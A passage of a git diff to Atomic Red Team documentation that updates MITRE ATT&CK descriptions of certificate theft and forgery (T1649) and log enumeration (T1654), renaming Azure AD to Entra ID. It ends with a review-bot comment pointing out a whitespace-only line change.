+An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
## Atomic Tests
diff --git a/atomics/T1649/T1649.md b/atomics/T1649/T1649.md
index 9b950147d6..c8ce799c98 100644
--- a/atomics/T1649/T1649.md
+++ b/atomics/T1649/T1649.md
@@ -1,6 +1,6 @@
# T1649 - Steal or Forge Authentication Certificates
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1649)
-Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
diff --git a/atomics/T1654/T1654.md b/atomics/T1654/T1654.md
index da649736ad..e8d655c3c7 100644
--- a/atomics/T1654/T1654.md
+++ b/atomics/T1654/T1654.md
@@ -4,7 +4,9 @@
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
-Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
## Atomic Tests
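Review bot: the first `-`/`+` pair of this hunk is textually identical ("Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported..."), so that part of the change is whitespace-only (trailing whitespace or line ending); confirm it is intentional normalization rather than editor noise, and if it is, say so in the commit message. The new paragraph on monitoring logs in real time to track incident response is properly cited (Permiso GUI-Vil 2023) and reads fine.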